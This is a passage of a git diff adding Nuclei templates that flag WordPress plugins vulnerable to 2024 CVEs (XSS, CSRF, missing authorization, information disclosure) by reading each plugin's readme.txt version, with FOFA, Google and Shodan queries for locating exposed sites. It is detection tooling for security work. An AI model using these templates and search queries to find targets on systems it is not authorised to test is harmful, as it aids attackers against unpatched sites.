a/poc/cve/CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe.yaml b/poc/cve/CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe.yaml new file mode 100644 index 0000000000..78c7ce4bf2 --- /dev/null +++ b/poc/cve/CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe + +info: + name: > + Sign-up Sheets <= 2.2.12 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Sign-up Sheets plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['REQUEST_URI'] without appropriate escaping on the URL in all versions up to, and including, 2.2.12. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba06e298-308d-4378-96b8-5ac4e7cc63c0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6020 + metadata: + fofa-query: "wp-content/plugins/sign-up-sheets/" + google-query: inurl:"/wp-content/plugins/sign-up-sheets/" + shodan-query: 'vuln:CVE-2024-6020' + tags: cve,wordpress,wp-plugin,sign-up-sheets,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sign-up-sheets/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sign-up-sheets" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.12') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml b/poc/cve/CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml new file mode 100644 index 0000000000..bdd003de1e --- /dev/null +++ b/poc/cve/CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4 + +info: + name: > + Custom Post Limits <= 4.4.1 - Unauthenticated Full Path Disclosure + author: topscoder + severity: medium + description: > + The Custom Post Limits plugin for WordPress is vulnerable to full path disclosure in all versions up to, and including, 4.4.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cf4a11e-ad28-4a93-9278-1d2d113a4859?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6544 + metadata: + fofa-query: "wp-content/plugins/custom-post-limits/" + google-query: inurl:"/wp-content/plugins/custom-post-limits/" + shodan-query: 'vuln:CVE-2024-6544' + tags: cve,wordpress,wp-plugin,custom-post-limits,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-post-limits/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-post-limits" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c.yaml b/poc/cve/CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c.yaml new file mode 100644 index 0000000000..64e33c38e6 --- /dev/null +++ b/poc/cve/CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c + +info: + name: > + WP ULike 4.7.1 - 4.7.2 - Authenticated (Subscriber+) Stored-Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP ULike – The Ultimate Engagement Toolkit for Websites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the first name field in versions 4.7.1 to 4.7.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7e7a289f-39ef-4961-bd08-34e6a7dfdac5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-6792 + metadata: + fofa-query: "wp-content/plugins/wp-ulike/" + google-query: inurl:"/wp-content/plugins/wp-ulike/" + shodan-query: 'vuln:CVE-2024-6792' + tags: cve,wordpress,wp-plugin,wp-ulike,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-ulike/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-ulike" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 4.7.1', '<= 4.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml b/poc/cve/CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml new file mode 100644 index 0000000000..656766bda4 --- /dev/null +++ b/poc/cve/CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b + +info: + name: > + Chatbot with ChatGPT <= 2.4.4 - Missing Authorization + author: topscoder + severity: high + description: > + The Chatbot with ChatGPT WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the wdgpt_purge_chat_logs and wdgpt_purge_error_logs functions in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to purge logs. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/17b0366c-f170-420d-b0d5-5c2f9f9e1cca?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6846 + metadata: + fofa-query: "wp-content/plugins/smartsearchwp/" + google-query: inurl:"/wp-content/plugins/smartsearchwp/" + shodan-query: 'vuln:CVE-2024-6846' + tags: cve,wordpress,wp-plugin,smartsearchwp,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smartsearchwp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smartsearchwp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6888-b452cc3f182752280bb057c3435438a7.yaml b/poc/cve/CVE-2024-6888-b452cc3f182752280bb057c3435438a7.yaml new file mode 100644 index 0000000000..0df9e414be --- /dev/null +++ b/poc/cve/CVE-2024-6888-b452cc3f182752280bb057c3435438a7.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6888-b452cc3f182752280bb057c3435438a7 + +info: + name: > + Secure Copy Content Protection and Content Locking <= 4.1.6 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS setting in all versions up to, and including, 4.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a621cd24-d012-40f0-bfac-29268751f772?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6888 + metadata: + fofa-query: "wp-content/plugins/secure-copy-content-protection/" + google-query: inurl:"/wp-content/plugins/secure-copy-content-protection/" + shodan-query: 'vuln:CVE-2024-6888' + tags: cve,wordpress,wp-plugin,secure-copy-content-protection,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/secure-copy-content-protection/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "secure-copy-content-protection" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml b/poc/cve/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml new file mode 100644 index 0000000000..349608c0e8 --- /dev/null +++ b/poc/cve/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e + +info: + name: > + Secure Copy Content Protection and Content Locking <= 4.1.6 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the "Custom class for tooltip container" field in all versions up to, and including, 4.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/25c35a42-9f1a-4f67-a074-c6359e8b1a41?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6889 + metadata: + fofa-query: "wp-content/plugins/secure-copy-content-protection/" + google-query: inurl:"/wp-content/plugins/secure-copy-content-protection/" + shodan-query: 'vuln:CVE-2024-6889' + tags: cve,wordpress,wp-plugin,secure-copy-content-protection,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/secure-copy-content-protection/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "secure-copy-content-protection" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6910-579d75d9cc4716699d11831eae3d5143.yaml b/poc/cve/CVE-2024-6910-579d75d9cc4716699d11831eae3d5143.yaml new file mode 100644 index 0000000000..68f6155ec6 --- /dev/null +++ b/poc/cve/CVE-2024-6910-579d75d9cc4716699d11831eae3d5143.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6910-579d75d9cc4716699d11831eae3d5143 + +info: + name: > + EventON <= 2.2.16 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The EventON plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.2.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/272746cd-0817-4dcb-8a4c-f1d84ed960b2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6910 + metadata: + fofa-query: "wp-content/plugins/eventon-lite/" + google-query: inurl:"/wp-content/plugins/eventon-lite/" + shodan-query: 'vuln:CVE-2024-6910' + tags: cve,wordpress,wp-plugin,eventon-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eventon-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eventon-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.16') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516.yaml b/poc/cve/CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516.yaml new file mode 100644 index 0000000000..0fa2812ce7 --- /dev/null +++ b/poc/cve/CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516 + +info: + name: > + Page Builder Gutenberg Blocks – CoBlocks <= 3.1.12 - Authenticated (Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Page Builder Gutenberg Blocks – CoBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post settings in all versions up to, and including, 3.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef54b45e-19e4-4423-aace-99b017cdd6ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7132 + metadata: + fofa-query: "wp-content/plugins/coblocks/" + google-query: inurl:"/wp-content/plugins/coblocks/" + shodan-query: 'vuln:CVE-2024-7132' + tags: cve,wordpress,wp-plugin,coblocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "coblocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.12') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml b/poc/cve/CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml new file mode 100644 index 0000000000..b7cbc6d242 --- /dev/null +++ b/poc/cve/CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06 + +info: + name: > + Ninja Forms – The Contact Form Builder That Grows With You <= 3.8.10 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in versions 3.8.6 to 3.8.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f7dc2c7-1a23-4677-b331-951960e76d43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7354 + metadata: + fofa-query: "wp-content/plugins/ninja-forms/" + google-query: inurl:"/wp-content/plugins/ninja-forms/" + shodan-query: 'vuln:CVE-2024-7354' + tags: cve,wordpress,wp-plugin,ninja-forms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ninja-forms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 3.8.6', '<= 3.8.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7423-beef10a23166777228f21f82780dd30d.yaml b/poc/cve/CVE-2024-7423-beef10a23166777228f21f82780dd30d.yaml new file mode 100644 index 0000000000..ae707b940d --- /dev/null +++ b/poc/cve/CVE-2024-7423-beef10a23166777228f21f82780dd30d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7423-beef10a23166777228f21f82780dd30d + +info: + name: > + Stream <= 4.0.1 - Cross-Site Request Forgery to Arbitrary Options Update + author: topscoder + severity: medium + description: > + The Stream plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.0.1. This is due to missing or incorrect nonce validation on the network_options_action() function. This makes it possible for unauthenticated attackers to update arbitrary options that can lead to DoS or privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9d15e418-36bb-4f53-ac67-8f6122591dd2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7423 + metadata: + fofa-query: "wp-content/plugins/stream/" + google-query: inurl:"/wp-content/plugins/stream/" + shodan-query: 'vuln:CVE-2024-7423' + tags: cve,wordpress,wp-plugin,stream,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/stream/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "stream" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa.yaml b/poc/cve/CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa.yaml new file mode 100644 index 0000000000..6fc664320c --- /dev/null +++ b/poc/cve/CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa + +info: + name: > + Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery and Client Logo Presentation <= 3.6.8 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery and Client Logo Presentation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/233319cc-10fc-4a15-be35-df772e700639?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7716 + metadata: + fofa-query: "wp-content/plugins/gs-logo-slider/" + google-query: inurl:"/wp-content/plugins/gs-logo-slider/" + shodan-query: 'vuln:CVE-2024-7716' + tags: cve,wordpress,wp-plugin,gs-logo-slider,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gs-logo-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gs-logo-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed.yaml b/poc/cve/CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed.yaml new file mode 100644 index 0000000000..0f824b6e48 --- /dev/null +++ b/poc/cve/CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed + +info: + name: > + Sensei LMS – Online Courses, Quizzes, & Learning <= 4.24.1 - Unauthenticated Email Template Disclosure + author: topscoder + severity: medium + description: > + The Sensei LMS – Online Courses, Quizzes, & Learning plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.24.1 via the /v2/sensei_email/ REST API endpoint due to a missing capability check. This makes it possible for unauthenticated attackers to extract data from email templates. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1df16802-c102-4ff2-b8ff-8a588905d3f7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-7786 + metadata: + fofa-query: "wp-content/plugins/sensei-lms/" + google-query: inurl:"/wp-content/plugins/sensei-lms/" + shodan-query: 'vuln:CVE-2024-7786' + tags: cve,wordpress,wp-plugin,sensei-lms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sensei-lms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sensei-lms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.24.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b.yaml b/poc/cve/CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b.yaml new file mode 100644 index 0000000000..33cbabfb78 --- /dev/null +++ b/poc/cve/CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b + +info: + name: > + Classified Listing – Classified ads & Business Directory Plugin <= 3.1.7 - Missing Authorization + author: topscoder + severity: low + description: > + The Classified Listing – Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions like export_forms(), import_forms(), update_fb_options(), and many more in all versions up to, and including, 3.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify forms and various other settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/494d2e69-0759-419a-a603-e8870c157e49?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-7888 + metadata: + fofa-query: "wp-content/plugins/classified-listing/" + google-query: inurl:"/wp-content/plugins/classified-listing/" + shodan-query: 'vuln:CVE-2024-7888' + tags: cve,wordpress,wp-plugin,classified-listing,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/classified-listing/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "classified-listing" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml b/poc/cve/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml new file mode 100644 index 0000000000..6521a6da0b --- /dev/null +++ b/poc/cve/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7891-a07b427b3532ab45f1726dadba231414 + +info: + name: > + Floating Contact Button <= 2.7 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Floating Contact Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9de6f14-67e4-40c2-8efb-7e9cad659d37?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7891 + metadata: + fofa-query: "wp-content/plugins/floating-contact/" + google-query: inurl:"/wp-content/plugins/floating-contact/" + shodan-query: 'vuln:CVE-2024-7891' + tags: cve,wordpress,wp-plugin,floating-contact,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/floating-contact/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "floating-contact" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml b/poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml new file mode 100644 index 0000000000..638c2d563b --- /dev/null +++ b/poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd + +info: + name: > + Starbox – the Author Box for Humans <= 3.5.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Starbox – the Author Box for Humans plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/210fd125-285d-4d07-bd39-b5ea222025ea?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7955 + metadata: + fofa-query: "wp-content/plugins/starbox/" + google-query: inurl:"/wp-content/plugins/starbox/" + shodan-query: 'vuln:CVE-2024-7955' + tags: cve,wordpress,wp-plugin,starbox,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/starbox/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "starbox" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml b/poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml new file mode 100644 index 